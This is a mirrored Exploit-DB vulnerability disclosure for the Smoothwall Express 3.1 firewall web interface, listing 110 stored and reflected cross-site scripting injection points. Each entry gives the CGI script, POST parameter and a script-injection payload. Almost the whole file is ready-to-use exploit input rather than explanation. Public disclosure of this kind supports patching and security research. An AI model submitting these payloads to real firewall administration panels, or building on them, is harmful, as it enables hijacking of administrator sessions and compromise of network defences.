bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/cgi/webapps/46333.txt
Offensive Security 1982f33252 DB: 2019-02-13 
16 changes to exploits/shellcodes

AirDroid 4.2.1.6 - Denial of Service

River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH)
Android - binder Use-After-Free via fdget() Optimization
Android - binder Use-After-Free of VMA via race Between reclaim and munmap
Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow
River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH)
runc< 1.0-rc6 (Docker < 18.09.2) - Host Command Execution
Ubuntu snapd < 2.37.1 - Local Privilege Escalation
IPFire 2.21 - Cross-Site Scripting
MyBB Bans List 1.0 - Cross-Site Scripting
IPFire 2.21 - Cross-Site Scripting
MyBB Bans List 1.0 - Cross-Site Scripting

Webiness Inventory 2.3 - 'email' SQL Injection
OPNsense < 19.1.1 - Cross-Site Scripting
Jenkins 2.150.2 -  Remote Command Execution (Metasploit)
BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution
LayerBB 1.1.2 - Cross-Site Scripting
2019-02-13 05:01:49 +00:00

1779 lines
No EOL
27 KiB
Text
Raw Blame History

##################################################################################################################################
# Exploit Title: Smoothwall Express 3.1-SP4-polar-x86_64-update9 |
Cross-Site Scripting
# Date: 06.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.smoothwall.org
# Software Link: https://sourceforge.net/projects/smoothwall/files/SmoothWall/3.1%20SP4/Express-3.1-SP4-x86_64.iso/download
# Version: 3.1-SP4-polar-x86_64-update9
##################################################################################################################################
Introduction
The Smoothwall Open Source Project was set up in 2000 to develop and maintain Smoothwall Express - a Free firewall that includes its own security-hardened GNU/Linux operating system and an easy-to-use web interface.
#################################################################################
XSS details: Reflected & Stored
#################################################################################
XSS1 | Stored
URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?
METHOD
Post
PARAMETER
CACHE_SIZE
PAYLOAD
'><script>alert(1)</script>
#################################################################################
XSS2 | Stored
URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?
METHOD
Post
PARAMETER
MAX_SIZE
PAYLOAD
'><script>alert(2)</script>
#################################################################################
XSS3 | Stored
URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?
METHOD
Post
PARAMETER
MIN_SIZE
PAYLOAD
'><script>alert(3)</script>
#################################################################################
XSS4 | Reflected
URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?
METHOD
Post
PARAMETER
MAX_OUTGOING_SIZE
PAYLOAD
'><script>alert(4)</script>
#################################################################################
XSS5 | Stored
URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?
METHOD
Post
PARAMETER
MAX_INCOMING_SIZE
PAYLOAD
'><script>alert(5)</script>
#################################################################################
XSS6 | Stored
URL
http://192.168.2.200:81/cgi-bin/urlfilter.cgi
METHOD
Post
PARAMETER
REDIRECT_PAGE
PAYLOAD
'><script>alert(6)</script>
#################################################################################
XSS7 | Reflected
URL
http://192.168.2.200:81/cgi-bin/urlfilter.cgi
METHOD
Post
PARAMETER
CHILDREN
PAYLOAD
'><script>alert(7)</script>
#################################################################################
XSS8 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
BOOT_SERVER
PAYLOAD
'><script>alert(8)</script>
#################################################################################
XSS9 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
BOOT_FILE
PAYLOAD
'><script>alert(9)</script>
#################################################################################
XSS10 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
BOOT_ROOT
PAYLOAD
'><script>alert(10)</script>
#################################################################################
XSS11 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
START_ADDR
PAYLOAD
'><script>alert(11)</script>
#################################################################################
XSS12 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
END_ADDR
PAYLOAD
'><script>alert(12)</script>
#################################################################################
XSS13 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
DNS1
PAYLOAD
'><script>alert(13)</script>
#################################################################################
XSS14 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
DNS2
PAYLOAD
'><script>alert(14)</script>
#################################################################################
XSS15 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
NTP1
PAYLOAD
'><script>alert(15)</script>
#################################################################################
XSS16 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
NTP2
PAYLOAD
'><script>alert(16)</script>
#################################################################################
XSS17 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
WINS1
PAYLOAD
'><script>alert(17)</script>
#################################################################################
XSS18 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
WINS2
PAYLOAD
'><script>alert(18)</script>
#################################################################################
XSS19 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
DEFAULT_LEASE_TIME
PAYLOAD
'><script>alert(19)</script>
#################################################################################
XSS20 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
MAX_LEASE_TIME
PAYLOAD
'><script>alert(20)</script>
#################################################################################
XSS21 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
DOMAIN_NAME
PAYLOAD
'><script>alert(21)</script>
#################################################################################
XSS22 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
NIS_DOMAIN
PAYLOAD
'><script>alert(22)</script>
#################################################################################
XSS23 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
NIS1
PAYLOAD
'><script>alert(23)</script>
#################################################################################
XSS24 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
NIS2
PAYLOAD
'><script>alert(24)</script>
#################################################################################
XSS25 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
STATIC_HOST
PAYLOAD
'><script>alert(25)</script>
#################################################################################
XSS26 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
STATIC_DESC
PAYLOAD
'><script>alert(26)</script>
#################################################################################
XSS27 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
STATIC_MAC
PAYLOAD
'><script>alert(27)</script>
#################################################################################
XSS28 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
STATIC_IP
PAYLOAD
'><script>alert(28)</script>
#################################################################################
XSS29 | Reflected
URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?
METHOD
Post
PARAMETER
HOSTNAME
PAYLOAD
'><script>alert(29)</script>
#################################################################################
XSS30 | Reflected
URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?
METHOD
Post
PARAMETER
DOMAIN
PAYLOAD
'><script>alert(30)</script>
#################################################################################
XSS31 | Reflected
URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?
METHOD
Post
PARAMETER
LOGIN
PAYLOAD
'"><script>alert(31)</script>
#################################################################################
XSS32 | Reflected
URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?
METHOD
Post
PARAMETER
PASSWORD
PAYLOAD
'><script>alert(32)</script>
#################################################################################
XSS33 | Reflected
URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?
METHOD
Post
PARAMETER
COMMENT
PAYLOAD
'><script>alert(33)</script>
#################################################################################
XSS34 | Reflected
URL
http://192.168.2.200:81/cgi-bin/hosts.cgi?
METHOD
Post
PARAMETER
IP
PAYLOAD
'"><script>alert(34)</script>
#################################################################################
XSS35 | Reflected
URL
http://192.168.2.200:81/cgi-bin/hosts.cgi?
METHOD
Post
PARAMETER
HOSTNAME
PAYLOAD
'><script>alert(35)</script>
#################################################################################
XSS36 | Reflected
URL
http://192.168.2.200:81/cgi-bin/hosts.cgi?
METHOD
Post
PARAMETER
COMMENT
PAYLOAD
'><script>alert(36)</script>
#################################################################################
XSS37 | Reflected
URL
http://192.168.2.200:81/cgi-bin/time.cgi?
METHOD
Post
PARAMETER
NTP_SERVER
PAYLOAD
'><script>alert(37)</script>
#################################################################################
XSS38 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
BATTLEVEL
PAYLOAD
'><script>alert(38)</script>
#################################################################################
XSS39 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
RTMIN
PAYLOAD
'><script>alert(39)</script>
#################################################################################
XSS40 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
BATTDELAY
PAYLOAD
'><script>alert(40)</script>
#################################################################################
XSS41 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
TO
PAYLOAD
'><script>alert(41)</script>
#################################################################################
XSS42 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
ANNOY
PAYLOAD
'><script>alert(42)</script>
#################################################################################
XSS43 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
UPSIP
PAYLOAD
'><script>alert(43)</script>
#################################################################################
XSS44 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
UPSNAME
PAYLOAD
'><script>alert(44)</script>
#################################################################################
XSS45 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
UPSPORT
PAYLOAD
'><script>alert(45)</script>
#################################################################################
XSS46 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
POLLTIME
PAYLOAD
'><script>alert(46)</script>
#################################################################################
XSS47 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
UPSUSER
PAYLOAD
'><script>alert(47)</script>
#################################################################################
XSS48 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
NISPORT
PAYLOAD
'><script>alert(48)</script>
#################################################################################
XSS49 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
UPSAUTH
PAYLOAD
'><script>alert(49)</script>
#################################################################################
XSS50 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
EMAIL
PAYLOAD
'><script>alert(50)</script>
#################################################################################
XSS51 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
FROM
PAYLOAD
'><script>alert(51)</script>
#################################################################################
XSS52 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
CC
PAYLOAD
'><script>alert(52)</script>
#################################################################################
XSS53 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
SMSEMAIL
PAYLOAD
'><script>alert(53)</script>
#################################################################################
XSS54 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
SMTPSERVER
PAYLOAD
'><script>alert(54)</script>
#################################################################################
XSS55 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
PORT
PAYLOAD
'><script>alert(55)</script>
#################################################################################
XSS56 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
USER
PAYLOAD
'><script>alert(56)</script>
#################################################################################
XSS57 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
EMAIL_PASSWORD
PAYLOAD
'"><script>alert(57)</script>
#################################################################################
XSS58 | Reflected
URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?
METHOD
Post
PARAMETER
EXT
PAYLOAD
'><script>alert(58)</script>
#################################################################################
XSS59 | Reflected
URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?
METHOD
Post
PARAMETER
SRC_PORT_SEL
PAYLOAD
'><script>alert(59)</script>
#################################################################################
XSS60 | Reflected
URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?
METHOD
Post
PARAMETER
SRC_PORT
PAYLOAD
'><script>alert(60)</script>
#################################################################################
XSS61 | Reflected
URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?
METHOD
Post
PARAMETER
DEST_IP
PAYLOAD
'><script>alert(61)</script>
#################################################################################
XSS62 | Reflected
URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?
METHOD
Post
PARAMETER
DEST_PORT_SEL
PAYLOAD
'><script>alert(62)</script>
#################################################################################
XSS63 | Reflected
URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?
METHOD
Post
PARAMETER
COMMENT
PAYLOAD
'><script>alert(63)</script>
#################################################################################
XSS64 | Reflected
URL
http://192.168.2.200:81/cgi-bin/outgoing.cgi?
METHOD
Post
PARAMETER
MACHINE
PAYLOAD
'><script>alert(64)</script>
#################################################################################
XSS65 | Reflected
URL
http://192.168.2.200:81/cgi-bin/outgoing.cgi?
METHOD
Post
PARAMETER
MACHINECOMMENT
PAYLOAD
'><script>alert(65)</script>
#################################################################################
XSS66 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dmzholes.cgi?
METHOD
Post
PARAMETER
SRC_IP
PAYLOAD
'><script>alert(66)</script>
#################################################################################
XSS67 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dmzholes.cgi?
METHOD
Post
PARAMETER
DEST_IP
PAYLOAD
'><script>alert(67)</script>
#################################################################################
XSS68 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dmzholes.cgi?
METHOD
Post
PARAMETER
COMMENT
PAYLOAD
'><script>alert(68)</script>
#################################################################################
XSS69 | Reflected
URL
http://192.168.2.200:81/cgi-bin/xtaccess.cgi?
METHOD
Post
PARAMETER
EXT
PAYLOAD
'><script>alert(69)</script>
#################################################################################
XSS70 | Reflected
URL
http://192.168.2.200:81/cgi-bin/xtaccess.cgi?
METHOD
Post
PARAMETER
DEST_PORT
PAYLOAD
'><script>alert(70)</script>
#################################################################################
XSS71 | Reflected
URL
http://192.168.2.200:81/cgi-bin/xtaccess.cgi?
METHOD
Post
PARAMETER
COMMENT
PAYLOAD
'><script>alert(71)</script>
#################################################################################
XSS72 | Reflected
URL
http://192.168.2.200:81/cgi-bin/ipblock.cgi?
METHOD
Post
PARAMETER
SRC_IP
PAYLOAD
'><script>alert(72)</script>
#################################################################################
XSS73 | Reflected
URL
http://192.168.2.200:81/cgi-bin/ipblock.cgi?
METHOD
Post
PARAMETER
COMMENT
PAYLOAD
'><script>alert(73)</script>
#################################################################################
XSS74 | Reflected
URL
http://192.168.2.200:81/cgi-bin/timedaccess.cgi?
METHOD
Post
PARAMETER
MACHINES
PAYLOAD
'><script>alert(74)</script>
#################################################################################
XSS75 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
GREEN_ADDRESS
PAYLOAD
'><script>alert(75)</script>
#################################################################################
XSS76 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
GREEN_NETMASK
PAYLOAD
'><script>alert(76)</script>
#################################################################################
XSS77 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
RED_DHCP_HOSTNAME
PAYLOAD
'><script>alert(77)</script>
#################################################################################
XSS78 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
RED_ADDRESS
PAYLOAD
'><script>alert(78)</script>
#################################################################################
XSS79 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
DNS1_OVERRIDE
PAYLOAD
'><script>alert(79)</script>
#################################################################################
XSS80 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
DNS2_OVERRIDE
PAYLOAD
'><script>alert(80)</script>
#################################################################################
XSS81 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
RED_MAC
PAYLOAD
'><script>alert(81)</script>
#################################################################################
XSS82 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
RED_NETMASK
PAYLOAD
'><script>alert(82)</script>
#################################################################################
XSS83 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
DEFAULT_GATEWAY
PAYLOAD
'><script>alert(83)</script>
#################################################################################
XSS84 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
DNS1
PAYLOAD
'><script>alert(84)</script>
#################################################################################
XSS85 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
DNS2
PAYLOAD
'><script>alert(85)</script>
#################################################################################
XSS86 | Reflected
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
NAME
PAYLOAD
'><script>alert(86)</script>
#################################################################################
XSS87 | Reflected
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
LEFT
PAYLOAD
'><script>alert(87)</script>
#################################################################################
XSS88 | Reflected
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
LEFT_SUBNET
PAYLOAD
'><script>alert(88)</script>
#################################################################################
XSS89 | Reflected
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
RIGHT
PAYLOAD
'><script>alert(89)</script>
#################################################################################
XSS90 | Reflected
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
RIGHT_SUBNET
PAYLOAD
'><script>alert(90)</script>
#################################################################################
XSS91 | Reflected
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
SECRET1
PAYLOAD
'><script>alert(91)</script>
#################################################################################
XSS92 | Reflected
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
SECRET2
PAYLOAD
'><script>alert(92)</script>
#################################################################################
XSS93 | Reflected
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
COMMENT
PAYLOAD
'><script>alert(93)</script>
#################################################################################
XSS94 | Stored
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
filename
PAYLOAD
<script>alert(94)</script>
#################################################################################
XSS95 | Reflected
URL
http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat
METHOD
Post
PARAMETER
SOURCE_IP
PAYLOAD
"><script>alert(95)</script>
#################################################################################
XSS96 | Stored
URL
http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat
METHOD
Post
PARAMETER
FILTER
PAYLOAD
'><script>alert(96)</script>
#################################################################################
XSS97 | Reflected
URL
http://192.168.2.200:81/cgi-bin/ipinfo.cgi?
METHOD
Post
PARAMETER
IP
PAYLOAD
'><script>alert(97)</script>
#################################################################################
XSS98 | Reflected
URL
http://192.168.2.200:81/cgi-bin/iptools.cgi?
METHOD
Post
PARAMETER
IP
PAYLOAD
'><script>alert(98)</script>
#################################################################################
XSS99 | Reflected
URL
http://192.168.2.200:81/cgi-bin/smoothinfo.cgi?
METHOD
Post
PARAMETER
WRAP
PAYLOAD
'><script>alert(99)</script>
#################################################################################
XSS100 | Reflected
URL
http://192.168.2.200:81/cgi-bin/smoothinfo.cgi?
METHOD
Post
PARAMETER
SECTIONTITLE
PAYLOAD
'><script>alert(100)</script>
#################################################################################
XSS101 | Stored
URL
http://192.168.2.200:81/cgi-bin/modem.cgi?
METHOD
Post
PARAMETER
INIT
PAYLOAD
'><script>alert(101)</script>
#################################################################################
XSS102 | Stored
URL
http://192.168.2.200:81/cgi-bin/modem.cgi?
METHOD
Post
PARAMETER
HANGUP
PAYLOAD
'><script>alert(102)</script>
#################################################################################
XSS103 | Stored
URL
http://192.168.2.200:81/cgi-bin/modem.cgi?
METHOD
Post
PARAMETER
SPEAKER_ON
PAYLOAD
'><script>alert(103)</script>
#################################################################################
XSS104 | Stored
URL
http://192.168.2.200:81/cgi-bin/modem.cgi?
METHOD
Post
PARAMETER
SPEAKER_OFF
PAYLOAD
'><script>alert(104)</script>
#################################################################################
XSS105 | Stored
URL
http://192.168.2.200:81/cgi-bin/modem.cgi?
METHOD
Post
PARAMETER
TONE_DIAL
PAYLOAD
'><script>alert(105)</script>
#################################################################################
XSS106 | Stored
URL
http://192.168.2.200:81/cgi-bin/modem.cgi?
METHOD
Post
PARAMETER
PULSE_DIAL
PAYLOAD
'><script>alert(106)</script>
#################################################################################
XSS107 | Reflected
URL
http://192.168.2.200:81/cgi-bin/modem.cgi?
METHOD
Post
PARAMETER
TIMEOUT
PAYLOAD
'><script>alert(107)</script>
#################################################################################
XSS108 | Stored
URL
http://192.168.2.200:81/cgi-bin/preferences.cgi?
METHOD
Post
PARAMETER
HOSTNAME
PAYLOAD
'><script>alert(108)</script>
#################################################################################
XSS109 | Stored
URL
http://192.168.2.200:81/cgi-bin/preferences.cgi?
METHOD
Post
PARAMETER
KEYMAP
PAYLOAD
'><script>alert(109)</script>
#################################################################################
XSS110 | Stored
URL
http://192.168.2.200:81/cgi-bin/preferences.cgi?
METHOD
Post
PARAMETER
OPENNESS
PAYLOAD
'><script>alert(110)</script>
#################################################################################
Reference in a new issue View git blame Copy permalink